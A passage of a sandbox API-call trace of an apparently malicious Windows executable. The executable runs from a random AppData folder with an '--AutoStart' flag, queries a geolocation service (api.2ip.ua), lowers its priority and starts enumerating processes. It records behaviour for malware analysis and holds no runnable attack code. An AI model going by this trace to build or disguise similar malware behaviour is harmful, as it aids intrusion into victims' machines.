lpUsedDefaultChar=0x0) returned 18 [0216.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x12) returned 0x650ce8 [0216.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x650ce8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0216.616] GetLastError () returned 0x0 [0216.616] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x50 [0216.616] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x54) returned 0x650da8 [0216.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0216.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x18) returned 0x650d08 [0216.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x650d08, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0216.616] GetLastError () returned 0x0 [0216.616] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x54 [0216.616] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x58) returned 0x650da8 [0216.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0216.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1b) returned 0x64f3e8 [0216.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x64f3e8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0216.616] GetLastError () returned 0x0 [0216.616] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x58 [0216.616] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x5c) returned 0x650da8 [0216.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0216.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x64ad40 [0216.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x64ad40, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0216.616] GetLastError () returned 0x0 [0216.616] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x5c [0216.616] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x60) returned 0x650da8 [0216.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0216.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x29) returned 0x64b420 [0216.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x64b420, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0216.616] GetLastError () returned 0x0 [0216.616] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x60 [0216.616] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x64) returned 0x650da8 [0216.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0216.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1e) returned 0x64f410 [0216.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x64f410, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0216.617] GetLastError () returned 0x0 [0216.617] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x64 [0216.617] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x68) returned 0x650da8 [0216.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0216.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x41) returned 0x646ed0 [0216.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x646ed0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0216.617] GetLastError () returned 0x0 [0216.617] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x68 [0216.617] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x6c) returned 0x650da8 [0216.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0216.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x17) returned 0x650e20 [0216.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x650e20, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0216.617] GetLastError () returned 0x0 [0216.617] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x6c [0216.617] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x70) returned 0x650da8 [0216.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0216.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x14) returned 0x650e40 [0216.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x650e40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SESSIONNAME=Console", lpUsedDefaultChar=0x0) returned 20 [0216.617] GetLastError () returned 0x0 [0216.617] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x70 [0216.617] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x74) returned 0x650e60 [0216.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0216.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xf) returned 0x64e978 [0216.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x64e978, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0216.617] GetLastError () returned 0x0 [0216.618] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650e60) returned 0x74 [0216.618] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650e60, Size=0x78) returned 0x650e60 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0216.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x16) returned 0x650da8 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x650da8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0216.618] GetLastError () returned 0x0 [0216.618] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650e60) returned 0x78 [0216.618] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650e60, Size=0x7c) returned 0x650e60 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0216.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2a) returned 0x64b458 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x64b458, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0216.618] GetLastError () returned 0x0 [0216.618] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650e60) returned 0x7c [0216.618] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650e60, Size=0x80) returned 0x650e60 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0216.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x29) returned 0x64b490 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x64b490, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0216.618] GetLastError () returned 0x0 [0216.618] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650e60) returned 0x80 [0216.618] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650e60, Size=0x84) returned 0x650e60 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0216.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x15) returned 0x650dc8 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x650dc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0216.618] GetLastError () returned 0x0 [0216.618] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650e60) returned 0x84 [0216.618] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650e60, Size=0x88) returned 0x650e60 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0216.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1e) returned 0x64f438 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x64f438, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0216.619] GetLastError () returned 0x0 [0216.619] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650e60) returned 0x88 [0216.619] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650e60, Size=0x8c) returned 0x650e60 [0216.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0216.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2a) returned 0x64b4c8 [0216.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x64b4c8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0216.619] GetLastError () returned 0x0 [0216.619] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650e60) returned 0x8c [0216.619] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650e60, Size=0x90) returned 0x650e60 [0216.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0216.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x12) returned 0x650de8 [0216.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x650de8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0216.619] GetLastError () returned 0x0 [0216.619] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650e60) returned 0x90 [0216.619] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650e60, Size=0x94) returned 0x650e60 [0216.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0216.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x18) returned 0x650f00 [0216.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x650f00, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0216.619] GetLastError () returned 0x0 [0216.619] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650e60) returned 0x94 [0216.619] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650e60, Size=0x98) returned 0x650e60 [0216.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0216.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x46) returned 0x646f20 [0216.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x646f20, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0216.619] GetLastError () returned 0x0 [0216.619] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650e60) returned 0x98 [0216.619] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650e60, Size=0x9c) returned 0x650f20 [0216.619] GetLastError () returned 0x0 [0216.699] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650918) returned 0x80 [0216.699] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650918) returned 0x80 [0216.700] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650918) returned 0x80 [0216.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8ec) returned 0x651fd0 [0216.833] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650918) returned 0x80 [0216.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x64e990 [0216.833] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650918) returned 0x80 [0216.833] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650918) returned 0x80 [0216.835] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650918) returned 0x80 [0216.919] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650918) returned 0x80 [0216.965] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0218.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x645e48 [0218.386] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0224.971] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18aa20, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d220 | out: lpBuffer=0x18aa20*, lpdwNumberOfBytesRead=0x18d220*=0x1d0) returned 1 [0224.972] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0224.975] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0224.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x65d640 [0224.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1e0) returned 0x31b2778 [0225.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b2778 | out: hHeap=0x630000) returned 1 [0225.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65d640 | out: hHeap=0x630000) returned 1 [0225.008] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x645e48 | out: hHeap=0x630000) returned 1 [0225.015] GetCurrentProcess () returned 0xffffffff [0225.015] GetLastError () returned 0x2 [0225.015] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0225.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x685880 [0225.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8ec) returned 0x31cb8b8 [0225.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x686230 [0225.045] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x686230, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmjek7fnkhtt.exe")) returned 0x65 [0225.045] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5") returned 1 [0225.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x31cc1b0 [0225.052] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart" [0225.052] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart", pNumArgs=0x18d300 | out: pNumArgs=0x18d300) returned 0x317e510*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" [0225.052] lstrcpyW (in: lpString1=0x18df90, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" [0225.060] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart" [0225.060] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart", pNumArgs=0x18d29c | out: pNumArgs=0x18d29c) returned 0x317e510*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" [0225.060] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe") returned="h1rxxmJek7fnkHTT.exe" [0225.060] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74ea0000 [0225.061] GetProcAddress (hModule=0x74ea0000, lpProcName="EnumProcesses") returned 0x0 [0225.061] GetProcAddress (hModule=0x74ea0000, lpProcName="EnumProcessModules") returned 0x0 [0225.061] GetProcAddress (hModule=0x74ea0000, lpProcName="GetModuleBaseNameW") returned 0x0 [0225.061] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x76d20000 [0225.115] GetProcAddress (hModule=0x76d20000, lpProcName="EnumProcesses") returned 0x76d21544 [0225.115] GetProcAddress (hModule=0x76d20000, lpProcName="EnumProcessModules") returned 0x76d21408 [0225.115] GetProcAddress (hModule=0x76d20000, lpProcName="GetModuleBaseNameW") returned 0x76d2152c [0225.115] EnumProcesses (in: lpidProcess=0x182a98, cb=0xa000, lpcbNeeded=0x18d2a8 | out: lpidProcess=0x182a98, lpcbNeeded=0x18d2a8) returned 1 [0225.119] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0225.119] CloseHandle (hObject=0x0) returned 0 [0225.119] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0225.119] CloseHandle (hObject=0x0) returned 0 [0225.119] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0225.119] CloseHandle (hObject=0x0) returned 0 [0225.119] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0225.119] CloseHandle (hObject=0x0) returned 0 [0225.119] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x0 [0225.119] CloseHandle (hObject=0x0) returned 0 [0225.119] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x0 [0225.119] CloseHandle (hObject=0x0) returned 0 [0225.119] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1a8) returned 0x0 [0225.119] CloseHandle (hObject=0x0) returned 0 [0225.119] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0225.119] CloseHandle (hObject=0x0) returned 0 [0225.120] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0225.120] CloseHandle (hObject=0x0) returned 0 [0225.120] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0225.120] CloseHandle (hObject=0x0) returned 0 [0225.120] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0225.120] CloseHandle (hObject=0x0) returned 0 [0225.120] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0225.120] CloseHandle (hObject=0x0) returned 0 